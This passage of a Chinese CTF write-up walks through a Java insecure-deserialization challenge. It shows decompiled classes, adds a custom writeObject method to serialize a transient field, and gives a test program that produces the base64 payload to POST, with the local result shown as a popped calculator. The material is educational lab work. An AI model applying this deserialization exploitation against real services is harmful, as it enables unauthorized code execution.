class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (obj <span class="keyword">instanceof</span> User) &#123;</span><br><span class="line">            User user = (User)obj;</span><br><span class="line">            <span class="keyword">return</span> user.getAge().equals(<span class="keyword">this</span>.age) &amp;&amp; user.getHeight().equals(<span class="keyword">this</span>.height) &amp;&amp; user.getName().equals(<span class="keyword">this</span>.name);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">toString</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;User&#123;name=&#x27;&quot;</span> + <span class="keyword">this</span>.name + <span class="string">&#x27;\&#x27;&#x27;</span> + <span class="string">&quot;, age=&#x27;&quot;</span> + <span class="keyword">this</span>.age + <span class="string">&#x27;\&#x27;&#x27;</span> + <span class="string">&quot;, height=&#x27;&quot;</span> + <span class="keyword">this</span>.height + <span class="string">&#x27;\&#x27;&#x27;</span> + <span class="string">&#x27;&#125;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>user会有初始值，我们需要让u=user，需要搞清楚u是怎么来的，再放一遍代码，是通过我们传入的base64的参数进行base64解码然后经过SerAndDe.deserialize方法之后强制转换成User类，这里的话我们大概可以知道这是个反序列化的函数，需要拿到他原始的值只需要序列化即可，这里题目自带了序列化的函数，我们只需要调用即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if (Secr3t.getKey().equals(key) &amp;&amp; text != null) &#123;</span><br><span class="line">    Decoder decoder = Base64.getDecoder();</span><br><span class="line">    byte[] textByte = decoder.decode(text);</span><br><span class="line">    User u = (User)SerAndDe.deserialize(textByte);</span><br></pre></td></tr></table></figure>

<p>给出SerAndDe的代码，其实这里影响不大，具体往下看</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> util;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">SerAndDe</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">private</span> <span class="title">SerAndDe</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">byte</span>[] serialize(Object object) &#123;</span><br><span class="line">        ObjectOutputStream oos = <span class="keyword">null</span>;</span><br><span class="line">        ByteArrayOutputStream bos = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line">        Object var4;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            bos = <span class="keyword">new</span> ByteArrayOutputStream();</span><br><span class="line">            oos = <span class="keyword">new</span> ObjectOutputStream(bos);</span><br><span class="line">            oos.writeObject(object);</span><br><span class="line">            <span class="keyword">byte</span>[] b = bos.toByteArray();</span><br><span class="line">            <span class="keyword">byte</span>[] var16 = b;</span><br><span class="line">            <span class="keyword">return</span> var16;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException var14) &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;serialize Exception:&quot;</span> + var14.toString());</span><br><span class="line">            var4 = <span class="keyword">null</span>;</span><br><span class="line">        &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                <span class="keyword">if</span> (oos != <span class="keyword">null</span>) &#123;</span><br><span class="line">                    oos.close();</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">if</span> (bos != <span class="keyword">null</span>) &#123;</span><br><span class="line">                    bos.close();</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; <span class="keyword">catch</span> (IOException var13) &#123;</span><br><span class="line">                System.out.println(<span class="string">&quot;io could not close:&quot;</span> + var13.toString());</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> (<span class="keyword">byte</span>[])var4;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">deserialize</span><span class="params">(<span class="keyword">byte</span>[] bytes)</span> </span>&#123;</span><br><span class="line">        ByteArrayInputStream bais = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line">        Object var3;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            bais = <span class="keyword">new</span> ByteArrayInputStream(bytes);</span><br><span class="line">            ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(bais);</span><br><span class="line">            var3 = ois.readObject();</span><br><span class="line">            <span class="keyword">return</span> var3;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException | ClassNotFoundException var13) &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;deserialize Exception:&quot;</span> + var13.toString());</span><br><span class="line">            var3 = <span class="keyword">null</span>;</span><br><span class="line">        &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                <span class="keyword">if</span> (bais != <span class="keyword">null</span>) &#123;</span><br><span class="line">                    bais.close();</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; <span class="keyword">catch</span> (IOException var12) &#123;</span><br><span class="line">                System.out.println(<span class="string">&quot;LogManage Could not serialize:&quot;</span> + var12.toString());</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> var3;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>我开始的时候是直接调用序列化方法，然后base64编码，但是确实没用，后面还是别的师傅和我说，有一个属性不可序列化，其中这个height加入了transient关键字，使他不能进行序列化，这里我们就直接看我上面放出的那篇文章吧，具体方法就是重写一个writeObject方法，手动重新赋值一个可序列化的属性给对象</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220411173900975.png" alt="image-20220411173900975"></p>
<p>手动在User类下面添加添加如下方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">writeObject</span><span class="params">(ObjectOutputStream s)</span> <span class="keyword">throws</span> IOException</span>&#123;</span><br><span class="line">    s.defaultWriteObject();</span><br><span class="line">    s.writeObject(<span class="string">&quot;180&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后随便写个测试类，然后直接输出base64的结果，这里可以自己把环境运行起来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">package VNCTF2022;</span><br><span class="line">import entity.User;</span><br><span class="line">import util.SerAndDe;</span><br><span class="line">import java.util.Base64;</span><br><span class="line">public class Test &#123;</span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        Base64.Decoder decoder = Base64.getDecoder();</span><br><span class="line">        User user = new User(&quot;m4n_q1u_666&quot;,&quot;666&quot;,&quot;180&quot;);</span><br><span class="line">        byte[] X= SerAndDe.serialize(user);</span><br><span class="line">        String text=Base64.getEncoder().encodeToString(X);</span><br><span class="line">        byte[] textByte=decoder.decode(text);</span><br><span class="line">        String Y = textByte.toString();</span><br><span class="line">        System.out.println(text);//base64</span><br><span class="line"></span><br><span class="line">        System.out.println(&quot;textByte: &quot;+textByte);//解base之后的 序列化结果</span><br><span class="line">        String out = SerAndDe.deserialize(textByte).toString();//反序列化结果</span><br><span class="line">        System.out.println(&quot;反序列化得到的结果为: &quot;+out);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220411173910411.png" alt="image-20220411173910411"></p>
<p>即可得到我们所需要的结果，然后post传入即可，这里因为是自己搭建的环境，所以不能执行/readflag，这里只需要弹个计算器即可</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220411173905852.png" alt="image-20220411173905852"></p>

  </div>
   
   

  
  <div class="post-copyright">
    <div class="post-copyright-icon"></div>
      <div class="post-copyright-author">
          <span class="post-copyright-meta">文章作者: </span>
            <span class="post-copyright-info">
              <a href="mailto:1444440144@qq.com" >ch1e</a>
            </span>
      </div>
      <div class="post-copyright-type">
          <span class="post-copyright-meta">文章链接: </span>
            <span class="post-copyright-info">
              <a href="https://ch1e.cn/2022/02/13/easyj4va/" >https://ch1e.cn/2022/02/13/easyj4va/</a>
            </span>
      </div><div class="post-copyright-notice">
          <span class="post-copyright-meta">版权声明: </span>
            <span class="post-copyright-info">本博客所有文章除特别声明外，均采用
              <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/ " target="_blank" >
                  CC BY-NC-SA 4.0 </a> 许可协议。转载请注明来自
              <a href="https://ch1e.cn/2022/02/13/easyj4va/" target="_blank" >ch1e</a>
              ！</span>
      </div>
  </div>
  


 

  




<div class="pagination-post">
    
    <a href="/2022/02/21/cc1/">
      <div class="prev-title"><i class="fas fa-chevron-left"></i>commons-collections1反序列化链分析</div>
      <div class="prev-desc">commons-collections1反序列化链分析前言最近入了P牛的知识星球，打算搞Java安全这一块了，所以有了这一篇CC链的分析结果，从0到1学习java安全，在学习的路上碰到了不少坑，...</div>
    </a>
    
    
    <a href="/2022/01/22/2022/">
      <div class="next-title">2022年的个人计划&amp;小目标<i class="fas fa-chevron-right"></i></div>
      <div class="next-desc">2022个人计划&amp;amp;目标🤞现在已经是上一年了，去年的目标貌似是在去年定的，哈哈哈，不知不觉已经入行一年多了，还是个脚本小子。
2021过去了 在这制定一下2022的小目标  以及对202...</div>
    </a>
    
</div>

</article>
 


  <div id="toc-wrap">
    <div id="toc">
      <div class="toc-title">
        <div>
          目录
            <span class="num">0%</span>
        </div>
        <progress class="progress" value="0" max="100"></progress>
      </div>
      <div class="toc-list">
         
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-text">正文</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B6%89%E5%8F%8A%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-text">涉及知识点</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="toc-text">复现过程</span></a></li></ol></li></ol>
      </div>
    </div>
  </div>


        </main>
        <section id="rightside">
    
    <div class="rightside-item">
        
        
         
        
        
            <a id="open-toc" title="目录">
                <i class="fas fa-list-ul"></i>
            </a>
        
         
         
        <a href="javascript:(0)" id="darkmode" title="深色/浅色 ">
            <i class="fas fa-moon"></i>
        </a>
         
        
        <a href="#" title="回到顶部">
            <i class="fas fa-arrow-up"></i>
        </a>
    </div>
</section>
         

<footer class="footer" id="footer">
    <div class="copyright">
      &copy; 2020 - 2022
        <i class="fas fa-fan"></i>
        ch1e
    </div>
    <div class="framework-info">
        <span>框架 </span>
        <a href="https://hexo.io" target="_blank">Hexo</a>
        <span class="footer-separator">|</span>
        <span>主题 </span>
        <a href="https://github.com/lete114/hexo-theme-MengD" target="_blank">MengD.(萌典) </a>
    </div>
    
    <div class="custom-text">我相信我可以，但我一直在路上，所以我有无限的可能！！</div>
</footer>
    </div>
    <div id="mask" onclick="closeAll()"></div>
    
    <div class="script">
        <script src="/js/main.js"></script>
        


<script src="/js/lazyload.js"></script>


    


        
    <script>
        getScript('https://cdn.jsdelivr.net/npm/pjax/pjax.min.js',LoadPjax)
        function LoadPjax() {
            var pjax = new Pjax({
                selectors: [
                    'head title',
                    'head meta[name="keywords"]',
                    'head meta[name="description"]',
                    'main',
                    '#rightside'
                ],
                cache: true,
                cacheBust: false
            });
        }

        // 清除时间
        var timer = null;
        // 执行进度条
        function ProgressStart() {
            // 设置初始进度
            var progress = 10;
            // 创建进度条 及 css样式
            var div = document.createElement('div');
            div.className = 'pjax-progress';
            document.body.prepend(div);
            // 定义随机数最大值最小值
            var max = 10, mini = 3;
            var result = max - mini;
            // 清除
            clearInterval(timer);
            // 0.5秒内累加进度
            timer = setInterval(function () {
                // 随机数
                var num = parseInt(Math.random() * result);
                var randomResult = num + mini;
                // 累加
                progress += randomResult
                document.getElementsByClassName('pjax-progress')[0].style.width = progress + '%';
                // 当进度达到95%时停止
                if (progress > 95) progress = 95
            }, 500)
        }
        // 加载进度条加载完毕
        function ProgressFinish() {
            clearInterval(timer);
            // 页面加载完毕后进度100% 并在0.7秒后删除
            var progress = document.getElementsByClassName('pjax-progress');
            progress[0].style.width = '100%';
            timer = setTimeout(function () {
                progress[0].parentNode.removeChild(progress[0])
            }, 700);
        }

        // 开始 PJAX 执行的函数
        document.addEventListener('pjax:send', function () {
            // 执行进度条
            ProgressStart()
        });
        // PJAX 完成之后执行的函数，可以和上面的重载放在一起
        document.addEventListener('pjax:complete', function () {

            // 加载进度条加载完毕
            ProgressFinish()
            // 执行所有方法
            exeAllFn()

            
                // 图片懒加载
                ImgLazyLoad('body img[data-img]', 'data-img')
            


            document.querySelectorAll('script[data-pjax]').forEach(item => {
                const newScript = document.createElement('script')
                const content = item.text || item.textContent || item.innerHTML || ''
                Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
                newScript.appendChild(document.createTextNode(content))
                item.parentNode.replaceChild(newScript, item)
            })
        });

        // Pjax请求错误时，跳转到404页面
        document.addEventListener('pjax:error', (err) => {
            if (err.request.status === 404) {
                pjax.loadUrl('/404.html')
            }
        })
    </script>

    </div>
</body>

</html>